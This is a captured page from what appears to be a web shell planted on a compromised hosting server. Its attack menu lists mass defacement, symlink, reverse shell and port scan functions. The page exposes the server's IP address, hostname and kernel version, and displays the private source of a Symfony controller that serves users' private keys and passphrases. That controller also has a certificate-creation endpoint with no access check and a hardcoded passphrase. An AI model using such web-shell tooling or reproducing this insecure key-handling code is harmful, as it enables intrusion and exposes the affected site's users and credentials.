ヤミRoot VoidGate
User / IP
:
216.73.216.110
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Controller
/
ApiSSL
/
Viewing: UserCertController.php
<?php namespace AppBundle\Controller\ApiSSL; use Symfony\Bundle\FrameworkBundle\Controller\Controller; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\HttpFoundation\JsonResponse; use Symfony\Component\HttpFoundation\Request; use FOS\RestBundle\Controller\Annotations as Rest; use Nelmio\ApiDocBundle\Annotation as Doc; use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security; use AppBundle\Entity\Staff; class UserCertController extends Controller { /** * Get the cert data of a user. * @param integer $id The id of the user * @Rest\Get("/staffs/{id}/cert-data") * @Rest\View( * statusCode = Response::HTTP_OK * ) * @Doc\ApiDoc( * section="Cert data", * resource=true, * description="Get the private/public key of a user.", * ) * @Security("has_role('ROLE_STAFF')") */ public function showAction(Request $request, Staff $user ) { //get the user who is sending the request. $connectedUser = $this->get('security.token_storage')->getToken()->getUser(); $pkiServer = $this->container->get('itravel.pki_node_server'); $certData = $pkiServer->loadUserCertData($user); if ($certData) { $checkResult = $pkiServer->checkCert($certData->getCert()); if($checkResult == true){ // hide the private key and the passphrase if the user requesting the cert is not the one to whom the cert belongs if($connectedUser->getId() !== $certData->getUserId()){ $certData->setprivateKey(null); $certData->setPassphrase(null); } return $certData; } } else { return new JsonResponse(['Error' => 'the user with id: '.$user->getId()." has no certData"], JsonResponse::HTTP_BAD_REQUEST); } } /** * create cert data of a user. * @param integer $id The id of the user * @Rest\Post("/staffs/{id}/cert-data") * @Rest\View( * statusCode = Response::HTTP_OK * ) * @Doc\ApiDoc( * section="Cert data", * resource=true, * description="creates the private/public key of a user.", * ) */ public function createAction(Request $request, Staff $user ) { //TODO: handle the case where the user already has a certificate $pkiServer = $this->container->get('itravel.pki_node_server'); $isCreated = $pkiServer->createAndSaveUserCert( $user, "passphrase"); return $isCreated; } }
Coded With 💗 by
0x6ick